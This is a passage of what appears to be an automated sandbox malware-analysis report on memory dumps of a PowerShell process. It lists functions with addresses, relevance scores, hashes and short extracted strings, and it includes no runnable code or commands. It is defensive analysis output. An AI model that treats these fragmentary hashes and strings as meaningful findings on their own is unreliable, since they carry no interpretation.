Instruction ID: e76deb03ea7ba422eb57bb7b73e036d4a221484f638855d5fcf60c94e8578d0e
Opcode Fuzzy Hash: 68666584c83b1946e6187997e5b2a0fc69b1f380d09c0545584a0c5e6b3e1618
Instruction Fuzzy Hash: 70716F70A00258DFDB14DFB5D885AAEBBF2BF84308F148429D415AB250DB74AD46DB51

Function 04549D33 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42edcd76c076ac0186d023a2f59704676550ecfe81ad977cd078f49942b2f051
Instruction ID: 53494c8508fa1312c5fb8b9166ba9e80769c4c9689fca7909ad53e6e73edb112
Opcode Fuzzy Hash: 42edcd76c076ac0186d023a2f59704676550ecfe81ad977cd078f49942b2f051
Instruction Fuzzy Hash: 39515EB0A00209DFDB14DFB5D8857AEBBB2BF84308F148829D406EB3A4DB75AD45DB50

Function 073DB0D5 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1490238729cdf8a181497c1aa006c578f9cf2c62dc0b185b33100fb8d882a3da
Instruction ID: 0dd9f871486eba2f6f0804da41973eac6937a6a279c83a02981ad7ec859f54f5
Opcode Fuzzy Hash: 1490238729cdf8a181497c1aa006c578f9cf2c62dc0b185b33100fb8d882a3da
Instruction Fuzzy Hash: B041ABF3B401588BDB119778A921AAEFBA39FC1314F1144AAC8199F751EF32CC5183B1

Function 04549AD9 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc3b22cee2f2cb3fce363020d66596d8aaf2366bf48f45df40d2284cd371fdc
Instruction ID: 22e7af6e00698737c3c484464206f04718946d0a19c7d4b35bff16d23bf2187f
Opcode Fuzzy Hash: 2dc3b22cee2f2cb3fce363020d66596d8aaf2366bf48f45df40d2284cd371fdc
Instruction Fuzzy Hash: A4417971A403049FDB189B34D999AAE7BF2BFC9315F044468E406EB7A0CF38AC41DB90

Function 073D8CF6 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46c446b2b4853ab1fd3ae38ff87d881e330f969cf1dc0788c20076e6d2dba96b
Instruction ID: 31583ae16eeb9245d7d1fd0839abf8fcca7cc651d8e5699cdd4794c9f505c58f
Opcode Fuzzy Hash: 46c446b2b4853ab1fd3ae38ff87d881e330f969cf1dc0788c20076e6d2dba96b
Instruction Fuzzy Hash: 73319370B40218ABD714A768C951FAFBBA3EB84344F108424E9017F7D5CF76AC528BE1

Function 0454C7B8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a82cc1075cd3127fef7f22b11e95689f52471635e5a8caf6134c1901482ff82
Instruction ID: 992a4f50cfbdcf2069b9e85f682f4a8a1eea40e942cd311ad53516c2bb3f51f1
Opcode Fuzzy Hash: 9a82cc1075cd3127fef7f22b11e95689f52471635e5a8caf6134c1901482ff82
Instruction Fuzzy Hash: 8F311D30A011288FCB26DB64D8546EEB7B2BF89309F1144E9D409AB351DB36AE91DF91

Function 045439D8 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63e99794e166c297a9a220d72f2beee5e74e0e3ecd2b3f771d2a12f623df2930
Instruction ID: 3dbd992917f71b772f0f7e9434251ca5889e6795867a46e30b1d86bab45b043d
Opcode Fuzzy Hash: 63e99794e166c297a9a220d72f2beee5e74e0e3ecd2b3f771d2a12f623df2930
Instruction Fuzzy Hash: B7319CB5E052559FCB01CF5CD8909AABFB0FF89300B15849AE844DB3A2D735EC45CBA1

Function 04544E88 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d9928ac89ed7084f466f906c6f25fface5692fe536685981c5cd9bb38ce7c6
Instruction ID: e8f5424fe7ec30afaf2cb76c80e1a68073c82016685ccce3ab72c8b4ffffc4d4
Opcode Fuzzy Hash: 89d9928ac89ed7084f466f906c6f25fface5692fe536685981c5cd9bb38ce7c6
Instruction Fuzzy Hash: 3C21F6B4A00119DFCB04DF59C980AAEFBB1FB88310B148569E919AB355C735FD51CBA4

Function 045445C0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8cdd24d1c496a3d44595bb7e734af9f23d9c494288fa6a0178d8e26e174d8a1
Instruction ID: 259c33e5be6c602b892ca64d113c52872e2532c1b1bdce17488254da72eff536
Opcode Fuzzy Hash: d8cdd24d1c496a3d44595bb7e734af9f23d9c494288fa6a0178d8e26e174d8a1
Instruction Fuzzy Hash: E021E374A006199FCB44DF99C9849AAFBB1FF89310B248569E919AB361C731FC41CFA0

Function 00F2D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299256877.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b39d6f8eafd5811e82aa4f43ab9ef841534ed5cc723d97facc98a53dd75bd5
Instruction ID: 240ed183a7379840154b5a1d7f63ef75f2abf98242bd61ff093721961f08d7b4
Opcode Fuzzy Hash: a5b39d6f8eafd5811e82aa4f43ab9ef841534ed5cc723d97facc98a53dd75bd5
Instruction Fuzzy Hash: 0E01A7724093509AE710CA25DD84767BFD8DF45334F18C52AED484A16AC679D841D6B1

Function 00F2D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299256877.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecc2be4b3b84289656aa587425d00ead97aa7b4a216aa92301fd76bd79d158a7
Instruction ID: e02d73b54f54cde18ef4c30e98cd5ee2efa3445f16ffe47b269c1adc92cc167c
Opcode Fuzzy Hash: ecc2be4b3b84289656aa587425d00ead97aa7b4a216aa92301fd76bd79d158a7
Instruction Fuzzy Hash: 21014C6240E3C09ED7128B259C94B52BFB4EF53224F1DC0DBD8888F1A7C2699C49D772

Function 073D219E Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ff3e228770b3eabf5e8f32a44a118b6717d9cc603c6c4982e7b980c675b730
Instruction ID: 31874c18d81607be507ccba4e6a1f0a2bf3902615bcbd05a8fffbde1e0247115
Opcode Fuzzy Hash: 14ff3e228770b3eabf5e8f32a44a118b6717d9cc603c6c4982e7b980c675b730
Instruction Fuzzy Hash: B901F9B1D082859FD31D4F689884116BFF1BF86714F29895ED4A88B201D731AC91CB40

Function 073D432A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9c481122754464ab5e449deaed4ecc0e1c58b897c026494d1e96ef85aa451c
Instruction ID: 9dc874afc675b8c6c26bef6501f88299fea8fc4ba59a58bf01935a24f17c9b41
Opcode Fuzzy Hash: de9c481122754464ab5e449deaed4ecc0e1c58b897c026494d1e96ef85aa451c
Instruction Fuzzy Hash: 53E08CB2601186DBF750CF08E590E64B7A2BB80359F1CC49A981C0F1A1CBB3DDA2CB80

Non-executed Functions

Function 073D0BB0 Relevance: 23.0, Strings: 18, Instructions: 486COMMON

Download Yara Rule

Strings

tP^q, xrefs: 073D0D2F
4'^q, xrefs: 073D0E3B
4'^q, xrefs: 073D0F23
84$l, xrefs: 073D0CBA
4'^q, xrefs: 073D0DAB
(o^q, xrefs: 073D1022
84$l, xrefs: 073D0E1A
tP^q, xrefs: 073D0E99
4'^q, xrefs: 073D0F13
4'^q, xrefs: 073D0CD8
(o^q, xrefs: 073D102E
84$l, xrefs: 073D0E24
tP^q, xrefs: 073D0D23
4'^q, xrefs: 073D0E4B
4'^q, xrefs: 073D0CCC
tP^q, xrefs: 073D0EA5
4'^q, xrefs: 073D0D9B
84$l, xrefs: 073D0CB0

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$84$l$84$l$84$l$84$l$tP^q$tP^q$tP^q$tP^q
API String ID: 0-4201379594
Opcode ID: e6b4b1700c63cabed281478611b24b3bd06679e89025491a5b18faeab2c92990
Instruction ID: 2b2664d00bcd6c42548b2eb3a43c4d47f2d0d108cbd43729673b9e2c9ef8c3ad
Opcode Fuzzy Hash: e6b4b1700c63cabed281478611b24b3bd06679e89025491a5b18faeab2c92990
Instruction Fuzzy Hash: D2022BB2B00219DFDB18DF68E454AAEBBB6BF89710F148469E8099F355CB31DC81C791

Function 073DDE3D Relevance: 19.0, Strings: 15, Instructions: 285COMMON

Download Yara Rule

Strings

tP^q, xrefs: 073DDF75
tP^q, xrefs: 073DE070
84$l, xrefs: 073DE01C
84$l, xrefs: 073DDF16
(dq, xrefs: 073DE08E
tP^q, xrefs: 073DE064
$^q, xrefs: 073DDE95
84$l, xrefs: 073DE012
4'^q, xrefs: 073DE13C
4'^q, xrefs: 073DE148
(dq, xrefs: 073DE098
(dq, xrefs: 073DE0CD
tP^q, xrefs: 073DDF69
(dq, xrefs: 073DE02A
84$l, xrefs: 073DDF20

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$84$l$84$l$84$l$84$l$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
API String ID: 0-1894362930
Opcode ID: 6d95993d78f1d565fb62b6be121270598fef44f62fd22768bf61841c9fd6c31d
Instruction ID: 2037932e53425849c2c348b95c4bc227be584f76e9828480ff69ef1bbc21e98d
Opcode Fuzzy Hash: 6d95993d78f1d565fb62b6be121270598fef44f62fd22768bf61841c9fd6c31d
Instruction Fuzzy Hash: F5A14EB2B501199FEB149F69E80076ABFE6BF88310F14846AE8099F394CB31DD45C7A1

Function 073D3658 Relevance: 12.8, Strings: 10, Instructions: 322COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D393A
4'^q, xrefs: 073D392E
4'^q, xrefs: 073D3750
$^q, xrefs: 073D3911
$^q, xrefs: 073D38C4
$^q, xrefs: 073D386F
$^q, xrefs: 073D384E
$^q, xrefs: 073D38D4
$^q, xrefs: 073D3905
4'^q, xrefs: 073D375C

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3512890053
Opcode ID: 030c50101628db64ec9179ff51d86488b1d7772156b3c36119565c6c9737b5d0
Instruction ID: efd4e75b9a9faa84de367bc24ecbe65313f8b315dc836994683a3d7f6a4c00fe
Opcode Fuzzy Hash: 030c50101628db64ec9179ff51d86488b1d7772156b3c36119565c6c9737b5d0
Instruction Fuzzy Hash: 37A17BF3B0420ADFEB244A79A84477ABBE6AF82210F14447AD449CB755DB35CC85C7A3

Function 073DE898 Relevance: 12.8, Strings: 10, Instructions: 291COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073DEBE0
XRcq, xrefs: 073DE8F9
XRcq, xrefs: 073DEA3D
4'^q, xrefs: 073DEBD4
tP^q, xrefs: 073DE9A8
$^q, xrefs: 073DE915
84$l, xrefs: 073DE951
84$l, xrefs: 073DE947
tP^q, xrefs: 073DE99C
XRcq, xrefs: 073DEA2D

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$84$l$84$l$XRcq$XRcq$XRcq$tP^q$tP^q$$^q
API String ID: 0-1627335840
Opcode ID: 435a6244fc13e54342f67610349d3675f586eb4d10647f1c3c060da6891ed977
Instruction ID: ad25b780628565c49096573a292e2db7a41897c3fe7021d771044dd4cc17db7b
Opcode Fuzzy Hash: 435a6244fc13e54342f67610349d3675f586eb4d10647f1c3c060da6891ed977
Instruction Fuzzy Hash: E0A12AB2B8421A9FDB149B69E40066ABFE7AFC5310F14C46AE80A9F395DB31DC41C761

Function 073D5340 Relevance: 10.5, Strings: 8, Instructions: 490COMMON

Download Yara Rule

Strings

$^q, xrefs: 073D55BB
$^q, xrefs: 073D5593
$^q, xrefs: 073D53CF
$^q, xrefs: 073D55C7
$^q, xrefs: 073D5397
4'^q, xrefs: 073D541C
$^q, xrefs: 073D53DB
4'^q, xrefs: 073D5410

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3732357466
Opcode ID: 2bf81e44cccb238671835dc5f043186873168b92acdd5e3d073805c971b22feb
Instruction ID: c5cb4df7c611a401f960e1f43a90c0093836fff6a7e164ca0c00988f62c31c19
Opcode Fuzzy Hash: 2bf81e44cccb238671835dc5f043186873168b92acdd5e3d073805c971b22feb
Instruction Fuzzy Hash: B7F16AF3B04306DFEB188E79E44466ABBE6AF85211F24847AE809CF251DB31CC55C7A1

Function 073D8498 Relevance: 10.3, Strings: 8, Instructions: 305COMMON

Download Yara Rule

Strings

(f&l, xrefs: 073D8794
(f&l, xrefs: 073D8616
(f&l, xrefs: 073D859B
(f&l, xrefs: 073D878A
(f&l, xrefs: 073D860C
(f&l, xrefs: 073D86DD
(f&l, xrefs: 073D8591
(f&l, xrefs: 073D86E7

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: (f&l$(f&l$(f&l$(f&l$(f&l$(f&l$(f&l$(f&l
API String ID: 0-2633027879
Opcode ID: d35beb95d09a13f5e7beecb190a167dbc99600a8301d06cb1375b2aea0bdd8dd
Instruction ID: 841108f83c32f1a2e90090047eb0721b17bcbdf79f430a72a89428ac187244d5
Opcode Fuzzy Hash: d35beb95d09a13f5e7beecb190a167dbc99600a8301d06cb1375b2aea0bdd8dd
Instruction Fuzzy Hash: 95C174F1E00219DFDB24CB98D941AAAF7B6BF85714F148429D8496BB54CB31FC81CB91

Function 073D1450 Relevance: 9.0, Strings: 7, Instructions: 292COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D153C
XY&l, xrefs: 073D150B
4'^q, xrefs: 073D1530
XY&l, xrefs: 073D1517
tP^q, xrefs: 073D16B0
tP^q, xrefs: 073D16A4
tP^q, xrefs: 073D1614

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$XY&l$XY&l$tP^q$tP^q$tP^q
API String ID: 0-4159075189
Opcode ID: 519fbcd2f41c39b06df75f490e39f179db4f8a3ae2c530f79b715332f61619af
Instruction ID: fa214c9958195039f64ff83c0af1ee745279bc77154fcfb4905a8b00ceb5e5c9
Opcode Fuzzy Hash: 519fbcd2f41c39b06df75f490e39f179db4f8a3ae2c530f79b715332f61619af
Instruction Fuzzy Hash: DBA14BF2B0425D8FEB158B69E804666FBF6AF86310F19C0AAD909CF251DB35CC45C7A1

Function 073D0148 Relevance: 7.8, Strings: 6, Instructions: 277COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D03D9
4'^q, xrefs: 073D03E5
4'^q, xrefs: 073D0235
XY&l, xrefs: 073D0203
4'^q, xrefs: 073D0229
XY&l, xrefs: 073D020F

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$XY&l$XY&l
API String ID: 0-1610837138
Opcode ID: 8e53f802b52d6c46b3b4f6099e7a2c12cd47cbdbe7d9c611b1861b4c31bda160
Instruction ID: 17dcf27cfd85fda5d63ee09fc96af2424abb976ba598e297571fe6a01be4c748
Opcode Fuzzy Hash: 8e53f802b52d6c46b3b4f6099e7a2c12cd47cbdbe7d9c611b1861b4c31bda160
Instruction Fuzzy Hash: 29912AF2B0521A8FDB18CB69E54466AFBF6AFC5A10F1480AAD40DDF251EB31CC45C7A1

Function 073D0B90 Relevance: 7.7, Strings: 6, Instructions: 241COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D0E3B
tP^q, xrefs: 073D0D23
84$l, xrefs: 073D0E1A
tP^q, xrefs: 073D0E99
4'^q, xrefs: 073D0CCC
84$l, xrefs: 073D0CB0

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$84$l$84$l$tP^q$tP^q
API String ID: 0-263027385
Opcode ID: 634fdb0e553f92f4c99cadf6640666e0caa1c6e6b65734aa271260229e4e8034
Instruction ID: 9727d649b59ff817d0fb6a2e9d13a7919b7db333150ec06c70ced714b460e87f
Opcode Fuzzy Hash: 634fdb0e553f92f4c99cadf6640666e0caa1c6e6b65734aa271260229e4e8034
Instruction Fuzzy Hash: 3D91A2F2A00219DFEB18CF54D544AADFBB2BF49B10F198456E849AF651C371EC81CB91

Function 073DCC98 Relevance: 7.7, Strings: 6, Instructions: 210COMMON

Download Yara Rule

Strings

$^q, xrefs: 073DCD99
$^q, xrefs: 073DCEAE
4'^q, xrefs: 073DCDB7
$^q, xrefs: 073DCD3E
4'^q, xrefs: 073DCDC3
$^q, xrefs: 073DCD89

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
API String ID: 0-3669853574
Opcode ID: 83fa907b1f60b3ac948a9c514d0824d702dcdca7ad561f730497c0cbe612274a
Instruction ID: 38e7bdf7396dc126e93feeeeb5345058821603b7b3fcd94ea1de021530c14132
Opcode Fuzzy Hash: 83fa907b1f60b3ac948a9c514d0824d702dcdca7ad561f730497c0cbe612274a
Instruction Fuzzy Hash: 266137F3B242099FEB288E29E8146A6BBE5AF85211F14D47AD40DCF651DB31CD85C7B0

Function 073D9568 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$^q, xrefs: 073D95E3
$^q, xrefs: 073D960B
$^q, xrefs: 073D959F
$^q, xrefs: 073D95EF
$^q, xrefs: 073D95BB
$^q, xrefs: 073D95FF

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 86a428aa4eb261ec08e2d650f2cdafd21de9f856afc3fc161affde166fe9b973
Instruction ID: a124040229a9433818c767abb63f8850ea946d5ff161b7d4870ad85cdd395edd
Opcode Fuzzy Hash: 86a428aa4eb261ec08e2d650f2cdafd21de9f856afc3fc161affde166fe9b973
Instruction Fuzzy Hash: C93129F3B043468FFB294AA5B850366F7A6EBC1620B14487EC44A8B649DF36EC59C351

Function 073DE24D Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

84$l, xrefs: 073DE2D7
tP^q, xrefs: 073DE336
$^q, xrefs: 073DE2A5
84$l, xrefs: 073DE2E1
tP^q, xrefs: 073DE32A

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 84$l$84$l$tP^q$tP^q$$^q
API String ID: 0-151073451
Opcode ID: 4738900eb36e25c7d622aba377f9adf451666d9e341744fab830514720f7aea1
Instruction ID: 1fe8cd9c9dd4434eef419ac5557af2a39671ed1310a465ada28edba4e2c3fac8
Opcode Fuzzy Hash: 4738900eb36e25c7d622aba377f9adf451666d9e341744fab830514720f7aea1
Instruction Fuzzy Hash: 6D6118B2B801199FD714AF68E404A7ABFE2AF89710F14C069E8199F391DB72DC41C791

Function 073D2C7D Relevance: 6.4, Strings: 5, Instructions: 118COMMON

Download Yara Rule

Strings

tP^q, xrefs: 073D2D8B
$^q, xrefs: 073D2E06
$^q, xrefs: 073D2CED
$^q, xrefs: 073D2D09
4'^q, xrefs: 073D2E3B

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: 3086a75d75f8084255ae1d8d40c16710f8295750d114d8229be4a5b7fbc33f2b
Instruction ID: fe0fd7604e969f734da8db72132b35a4733e2cc8cc7e8a211593706345497f9a
Opcode Fuzzy Hash: 3086a75d75f8084255ae1d8d40c16710f8295750d114d8229be4a5b7fbc33f2b
Instruction Fuzzy Hash: C64113F3A00205DFEB258E14E450BA7B7B1BF49720F1580AAE8295F695C731DD85CB91

Function 073DE88F Relevance: 6.4, Strings: 5, Instructions: 117COMMON

Download Yara Rule

Strings

XRcq, xrefs: 073DE8F9
$^q, xrefs: 073DE915
84$l, xrefs: 073DE947
tP^q, xrefs: 073DE99C
XRcq, xrefs: 073DEA2D

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 84$l$XRcq$XRcq$tP^q$$^q
API String ID: 0-528936465
Opcode ID: bed7123aaa669f85e81e685c135d695ebff3bcbc8856291a99dd0d27dede55e9
Instruction ID: b3f8f7a55da95607d39828897cd2898b80535497361cfdd240251092481131eb
Opcode Fuzzy Hash: bed7123aaa669f85e81e685c135d695ebff3bcbc8856291a99dd0d27dede55e9
Instruction Fuzzy Hash: 0141C4B2A4010ADFEB24CF59E144AA9BFE2BF45720F58C069E81D6F294C735DD41CB50

Function 073DD91D Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073DD9E5
$^q, xrefs: 073DD9B9
$^q, xrefs: 073DD973
$^q, xrefs: 073DD9AD
4'^q, xrefs: 073DD9D9

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 42aabf1d073d64b61f11131f2d5d55780f9d15d749149bf2eaca4b7cc124ded3
Instruction ID: ebed2666cc398ea54f988476d5d92f8e9e59c861b30e18fd5dbd5e4e3427fae7
Opcode Fuzzy Hash: 42aabf1d073d64b61f11131f2d5d55780f9d15d749149bf2eaca4b7cc124ded3
Instruction Fuzzy Hash: 203157F3B282068FEB294A79A440676B7EBAFC2511B24847FD44D8B645CB33CC85C761

Function 073D5D10 Relevance: 5.3, Strings: 4, Instructions: 277COMMON

Download Yara Rule

Strings

84$l, xrefs: 073D5DEB
84$l, xrefs: 073D5DF5
tP^q, xrefs: 073D5E42
tP^q, xrefs: 073D5E4E

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 84$l$84$l$tP^q$tP^q
API String ID: 0-4080315626
Opcode ID: ca67387fbf3d3a493def0eb3a49f19180454454cf34d225b252620c8700ba2c3
Instruction ID: 3141cc806174e89bafa7dbb9da038f46513d2929564254ecac6b0b51d795dc4d
Opcode Fuzzy Hash: ca67387fbf3d3a493def0eb3a49f19180454454cf34d225b252620c8700ba2c3
Instruction Fuzzy Hash: 10915CB2B00206DFD7189F79D8546BABBE6AF84710F24886AD819CF390DB31DC55C7A1

Function 073D8472 Relevance: 5.3, Strings: 4, Instructions: 264COMMON

Download Yara Rule

Strings

(f&l, xrefs: 073D878A
(f&l, xrefs: 073D860C
(f&l, xrefs: 073D86DD
(f&l, xrefs: 073D8591

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: (f&l$(f&l$(f&l$(f&l
API String ID: 0-3560550811
Opcode ID: 620c237514e5165e88bb86bb7b0b7e41cf85b5834056088360673da382f01fbb
Instruction ID: 296e25e692a407e440a58a93822366d631324593cbc51b1b4370cc4d687cd36b
Opcode Fuzzy Hash: 620c237514e5165e88bb86bb7b0b7e41cf85b5834056088360673da382f01fbb
Instruction Fuzzy Hash: 0AA1A2F2E00215DFEB20CF94E941AAAFBB2BF85714F148569D8496B654C731BC82CB91

Function 073DC1A0 Relevance: 5.2, Strings: 4, Instructions: 247COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073DC29E
tP^q, xrefs: 073DC400
tP^q, xrefs: 073DC3F4
4'^q, xrefs: 073DC2A8

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
